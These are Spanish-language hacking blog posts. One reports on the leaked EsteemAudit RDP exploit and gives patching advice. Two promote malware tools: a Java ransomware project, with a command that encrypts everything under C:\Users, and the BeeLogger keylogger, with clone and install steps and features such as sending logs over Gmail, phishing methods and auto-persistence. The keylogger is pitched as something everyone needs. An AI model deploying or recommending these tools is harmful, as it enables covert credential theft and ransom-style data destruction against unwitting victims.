EsteemAudit un exploit que apunta a RDP

EsteemAudit es una herramienta desarrollada por NSA y también filtrada por Shadow Brokers.

EsteemAudit apunta al servicio RDP (puerto 3389) en máquinas con Microsoft Windows Server 2003 y Windows XP. En este momento Shodan muestra alrededor 24.000 equipos con sistemas operativos abiertos.

Microsoft publicó los parches para las vulnerabilidades de SMB de WannaCry, pero la compañía aún no lanzó los parches para las otras tres herramientas de hacking publicadas por NSA, denominadas “EnglishmanDentist”, “EsteemAudit” y “ExplodingCan”.

Dado que Microsoft ya no soporta Windows Server 2003 y Windows XP, a diferencia de EternalBlue la compañía no ha lanzado ningún parche de emergencia para EsteemAudit hasta ahora.

EsteemAudit también puede usarse como crear un gusano, similar a WannaCry, y permite a los atacantes propagarlo en las redes empresariales, dejando miles de sistemas vulnerables al ransomware, al espionaje y a otros ataques maliciosos.

Los autores de Ransomware como CrySiS, Dharma y SamSam, que ya están infectando computadoras a través del protocolo RDP usando ataques de fuerza bruta, pueden aprovechar EsteemAudit en cualquier momento para ataques generalizados y tan dañinos como WannaCry.

“Actualmente, los sistemas basados ​​en Windows XP representan más del 7 por ciento de los sistemas operativos de escritorio que todavía están en uso y se calcula que hay más de 600.000 computadoras que alojan más de 175 millones de sitios web sobre Windows Server 2003, representando aproximadamente el 18 por ciento de la cuota de mercado global”, dicen los investigadores.

De las tres explotaciones restantes, “EnglishmanDentist”, “EsteemAudit” y “ExplodingCan”, ninguna se reproduce en plataformas que ejecutan Windows 7 o superior.
Dado que Microsoft no ha publicado ningún parche para esta vulnerabilidad, se recomienda a los administradores actualizar sus sistemas a versiones superiores para protegerse de los ataques de EsteenAudit. Si es difícil actualizar, sería bueno proteger el puerto RDP, ya sea deshabilitándolo o colocándolo detrás de un firewall.

Mientras tanto, enSilo ha lanzado un parche para ayudar a los usuarios de Windows XP y Server 2003 a proteger sus máquinas contra EsteemAudit. Puede aplicar el parche para proteger sus sistemas, pero tenga en cuenta que no es un parche oficial de Microsoft.

Fuente: TheHackerNews.com

#HackNic – Shadow77

JavaRansomware escrito en Java para propósitos educacionales.

El auge del Ransomware es sumamente sorprendente y tú qué tanto sabes del Ransomware?

El Ransomware es un malware que tiene como objetivo secuestrar los datos del usuario y pedir un rescate por ellos, pero exactamente como?

Una vez que el Ransomware infecta la máquina lo que hace es cifrar parte del disco duro o buscar información específica y cifrarla para pedir un rescate para recuperar dicha información, una vez que se haya pagado el rescate que por lo general se hace en Bitcoins (irrastreable) no es seguro recuperar la información.

Normalmente un ransomware se transmite tanto como un troyano como un gusano, infectando el sistema operativo, por ejemplo, con un archivo descargado o explotando una vulnerabilidad de software.

En este punto, el ransomware se iniciará y cifrará los archivos del usuario con una determinada clave, que sólo el creador del ransomware conoce y proveerá al usuario que la reclame a cambio de un pago.

Ahora el Proyecto!!

Este proyecto tiene como objetivo construir un crypto-ransomware casi funcional para propósitos educativos, escrito en Java puro. Básicamente, se cifrará sus archivos en segundo plano usando un algoritmo AES-256, un fuerte algoritmo de cifrado, utilizando RSA-4096 de clave pública para asegurar la clave AES Symetric y almacenarla en una base de datos embedded.

El software malicioso cifrar con la clave pública RSA-4096 antes de enviar cualquier carga útil a continuación, al servidor. Este enfoque con el transporte https juntos hacen la seguridad y la autenticación casi irrompible (en teoría).

Por propósitos educacionales el código completo no está disponible.

Cómo Usarlo

La forma más fácil de ejecutar este proyecto es utilizar el del .jar abrir un terminal cmd y sólo tiene que ejecutar los siguientes comandos.
git clone https://github.com/PanagiotisDrakatos/JavaRansomware.git


cd JarPath

Cifrar todos los archivos

$ java -jar JavaRansomware.jar C:\Users Encrypt


Descifrar todos los archivos

$ java -jar JavaRansomware.jar C:\Users Decrypt

Todo el proceso se debe realizar en una maquina virtual para no afectar nuestro sistema.

Fuente: PanagiotisDrakatos/JavaRansomware

#HackNic – Shadow77

BeeLogger -porque todos necesitamos un Keylogger

Todo el mundo ama los Keylogger a no ser que lo usen contra ti.

Un Keylogger no es más que un programa que registra las pulsaciones de nuestro teclado y guarda un registro de ello, en términos simples si estas infectado con un Keylogger deberias de cambiar tus passwords.

Esta vez traigo un Keylogger creado por Alisson Moretto4w4k3 que nos va a permitir una sencilla configuracion y personalizacion de manera rápida y lista para implementar.

El Keylogger envía los registros usando una cuenta de Gmail, por lo cual debemos activar el uso de aplicaciones menos seguras en la configuración de la cuenta:

 https://myaccount.google.com/lesssecureapps

Prerrequisitos:

  • apt
  • wine
  • wget
  • Linux
  • sudo
  • python 2.7
  • python 2.7 on Wine Machine
  • pywin32 on Wine Machine
  • pythoncom on Wine Machine

Características:

  • Enviar registros de cada 120 segundos.
  • Enviar registros cuando los caracteres > 50.
  • Enviar registros con GMAIL.
  • Se incluyen algunos métodos de phishing.
  • Sesión múltiples deshabilitado.
  • Auto Persistencia

Instalación:


Cloning:

git clone https://github.com/4w4k3/BeeLogger.git
cd BeeLogger
sudo su
chmod +x install.sh
./install.sh
python bee.py

Si tienes otra versión de Python:

python2.7 bee.py

Fuente: https://github.com/4w4k3/BeeLogger

#HackNic – Shadow77